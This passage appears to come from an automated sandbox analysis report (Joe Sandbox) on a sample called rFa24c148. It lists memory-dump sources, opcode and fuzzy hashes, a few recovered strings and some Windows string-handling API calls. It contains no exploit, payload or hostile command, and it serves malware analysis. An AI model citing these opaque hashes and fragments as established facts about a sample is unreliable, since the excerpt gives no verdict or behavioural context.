                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dbf333d6a46afa479c661894eff01412675f064c8667a178dbd89034fa802b91
                                                                                              • Instruction ID: 30ee09c6b26f98e8194536109d7ce3e20b902e709c9d9403a9562c61d449f9ad
                                                                                              • Opcode Fuzzy Hash: dbf333d6a46afa479c661894eff01412675f064c8667a178dbd89034fa802b91
                                                                                              • Instruction Fuzzy Hash: 8F913470E00228CBEF28CF98C8947ADBBB1FB45305F15816AD856BB281C7785A96DF44
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 068e376bb2d48232eda5806566f84189e2cd5aae6c77d5a6e3260a5cdfbff91e
                                                                                              • Instruction ID: b50c8aa62e1022faa0523462bc9082c254a891c8b7a0b6d235230cb6e00c602c
                                                                                              • Opcode Fuzzy Hash: 068e376bb2d48232eda5806566f84189e2cd5aae6c77d5a6e3260a5cdfbff91e
                                                                                              • Instruction Fuzzy Hash: D0817971D04228CFDF24CFA8C884BADBBB1FB44305F25816AD856BB281C7385A96CF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 90f7c6b476e538f5c80f6919ee05a76f5c0a6b18d6d689b251d68ff18896e93f
                                                                                              • Instruction ID: 91081cf311d25a809012e225b52d4c3b5f250b1ae059806297d05f5390b66a1f
                                                                                              • Opcode Fuzzy Hash: 90f7c6b476e538f5c80f6919ee05a76f5c0a6b18d6d689b251d68ff18896e93f
                                                                                              • Instruction Fuzzy Hash: BB817A71D04228CBEF24CFA8C8847ADBBB1FB44305F11816AD856BB2C1C7785A96DF44
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b93bd20ea5de8414a65fbfeb926355070cd3711eb5f3dddd59222d5fbdffa392
                                                                                              • Instruction ID: 08aa30644361a6a90b4bfdee527cb0e90186f6812c849098392b6a7b032e4156
                                                                                              • Opcode Fuzzy Hash: b93bd20ea5de8414a65fbfeb926355070cd3711eb5f3dddd59222d5fbdffa392
                                                                                              • Instruction Fuzzy Hash: D5712571E04228CFDF24CFA8C894BADBBB1FB45305F15806AE856BB281C7385996DF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 544fe90661504b3f73bb457df6893ab302009ecc2b1f879340368463567d4392
                                                                                              • Instruction ID: 4a61f6f80671d808dc41601989bb6c43c22881685a3a15352730304741b477df
                                                                                              • Opcode Fuzzy Hash: 544fe90661504b3f73bb457df6893ab302009ecc2b1f879340368463567d4392
                                                                                              • Instruction Fuzzy Hash: 10714771E04228CFEF24CFA8C894BADBBB1FB44305F15806AD856BB281C7785956DF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 62b97cb57a72ce22a6d8feb282019d17567d0fea9520e3f831b09b876e97210d
                                                                                              • Instruction ID: f5c122442136fd671463674f3a0102546b50c27f43e6df69360a8f4413a57d7a
                                                                                              • Opcode Fuzzy Hash: 62b97cb57a72ce22a6d8feb282019d17567d0fea9520e3f831b09b876e97210d
                                                                                              • Instruction Fuzzy Hash: 63715771E04228CBEF24CF98C884BADBBB1FB45305F15806AE856BB291C7785A56DF44
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: F$F$F$F
                                                                                              • API String ID: 0-1844600021
                                                                                              • Opcode ID: e44ba0f6790659360ad4ae006f5b1aea79d8f0372df0d68d58b7b56a6c3d0e74
                                                                                              • Instruction ID: 83d9e3d272aa3635d67b9dc7bb8a91170aa95f7a56f2dbce911687d895722bc2
                                                                                              • Opcode Fuzzy Hash: e44ba0f6790659360ad4ae006f5b1aea79d8f0372df0d68d58b7b56a6c3d0e74
                                                                                              • Instruction Fuzzy Hash: EE418174A013199FCB05EFB8C8516AFBBB2EF86304F1088A9D004AB355DB745D46CF91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Xbq$Xbq$Xbq$Xbq
                                                                                              • API String ID: 0-2732225958
                                                                                              • Opcode ID: a200ac5105161fa48bc9c7cb400860f8955fe653928d9b6bc61ea7d968d9dc98
                                                                                              • Instruction ID: ae578496df3389253567d0c1badaf15d677809b162301a480b949cea2b6f4b52
                                                                                              • Opcode Fuzzy Hash: a200ac5105161fa48bc9c7cb400860f8955fe653928d9b6bc61ea7d968d9dc98
                                                                                              • Instruction Fuzzy Hash: 65318171E047298BDF758FA9CD9036FB7B6EB98301F1444A9C419A7281DB708E91CB92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                              • API String ID: 0-3001612457
                                                                                              • Opcode ID: cc033f50724d3f43e1d3944a1ceadad54bfd376be12a7f379bed763db20d6596
                                                                                              • Instruction ID: 441de86db79d5508e4a46a6e6ce719e947b0d262726cba7de883ca07bbf3264b
                                                                                              • Opcode Fuzzy Hash: cc033f50724d3f43e1d3944a1ceadad54bfd376be12a7f379bed763db20d6596
                                                                                              • Instruction Fuzzy Hash: 08018F31B101259FCB688E2DC844A2577EBAF88B6972A456AEC46CF3B0DF31DC51C790
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B82,00000000,[Rename],00000000,00000000,00000000), ref: 00405958
                                                                                              • lstrcmpiA.KERNEL32(00405B82,00000000), ref: 00405970
                                                                                              • CharNextA.USER32(00405B82,?,00000000,00405B82,00000000,[Rename],00000000,00000000,00000000), ref: 00405981
                                                                                              • lstrlenA.KERNEL32(00405B82,?,00000000,00405B82,00000000,[Rename],00000000,00000000,00000000), ref: 0040598A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 190613189-0
                                                                                              • Opcode ID: f21a2c11da6ab3502238cdf1fad183a2072097fc1b5c712b12301f5e4005d6a7
                                                                                              • Instruction ID: 6e6ac9e946d98d70bf9313254ac0794fd071748d29dfdc9c098e77395f368069
                                                                                              • Opcode Fuzzy Hash: f21a2c11da6ab3502238cdf1fad183a2072097fc1b5c712b12301f5e4005d6a7
                                                                                              • Instruction Fuzzy Hash: B9F0C232504554EFC7029FA9DD0099EBBA8EF06260B2540B6E801F7210D274EE019BA9